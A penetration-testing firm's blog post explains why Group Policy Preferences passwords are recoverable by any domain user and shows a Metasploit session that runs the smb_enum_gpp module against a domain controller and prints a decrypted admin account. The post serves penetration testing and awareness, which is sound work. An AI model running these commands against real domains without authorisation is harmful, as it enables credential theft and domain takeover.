Group Policy Preferences (GPP) Pwned

How to enumerate GPP credentials as a domain user with access to the SMB share on the DC.

Over the past few months I’ve had a chance to clean up some code that we’ve used internally for penetration testing for some time now. This code was built to demonstrate the weaknesses of using Group Policy Preferences (GPP) to store and distribute local or domain credentials.

Group Policy Preferences is a method that system administrators can use to create new accounts and/or update account credentials for domain-joined systems. The problem with this method is two-fold. First, Microsoft decided to encrypt the credentials (for Group Policy Preferences) using a single/non-unique secret key. In other words, this key is the same for all Windows 2008 Domain Controllers (DC). Second, they decided to publish the secret key on MSDN. This allows anyone with knowledge of the secret key to decrypt stored credentials that are identified.

Microsoft has since published a blog post alerting administrators to the risks of using GPP to manage credentials. Only normal user domain credentials are required to access the SMB SYSVOL share (where the GPP files live on the DC). Leveraging this access, we can read GPP XML files and decrypt stored credentials using the known private key.

We have found that many organizations store local admin, domain service, and even Domain Admin account credentials using GPP.  The module that I submitted to the Metasploit Github repo provides the ability to enumerate GPP credentials as a domain user with access to the SMB share on the DC. Extracted credentials will be stored in the Metasploit creds tables.

[code]
msf > use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set SMBUSER jsmith
SMBUSER => jsmith
msf auxiliary(smb_enum_gpp) > set SMBPASS Password1!
SMBPASS => Password1!
msf auxiliary(smb_enum_gpp) > set SMBDOMAIN ACME
SMBDOMAIN => ACME
msf auxiliary(smb_enum_gpp) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf auxiliary(smb_enum_gpp) > show options

Module options (auxiliary/scanner/smb/smb_enum_gpp):

  Name Current Setting  Required  Description
–––––––– ––––––––––––––––––––––––––––––  ––––––––––––––––  ––––––––––––––––––––––
  RHOSTS 10.10.10.10 yes   The target address range or CIDR identifier
  RPORT 445 yes   The Target port
  SMBDomain ACME no   The Windows domain to use for authentication
  SMBPass Password1! no   The password for the specified username
  SMBSHARE SYSVOL yes   The name of the share on the server
  SMBUser jsmith no        The username to authenticate as
  STORE true no   Store the enumerated files in loot.
  THREADS 1 yes   The number of concurrent threads

msf auxiliary(smb_enum_gpp) > run

[…snip..]

NAME                         VALUE
———––                         ——————––
TYPE                         Groups.xml
USERNAME                     Admin
PASSWORD                     REDACTED!
DOMAIN CONTROLLER         10.10.10.10
DOMAIN                       acme.com
CHANGED                      2010-01-01 12:00:00
NEVER_EXPIRES?             1
DISABLED                     0
[/code]

About the Authors

Catch the Latest

Catch our latest exploits, news, articles, and events.

Ready to Discuss Your Next Continuous Threat Exposure Management Initiative?

Praetorian’s Offense Security Experts are Ready to Answer Your Questions

0 Shares
Copy link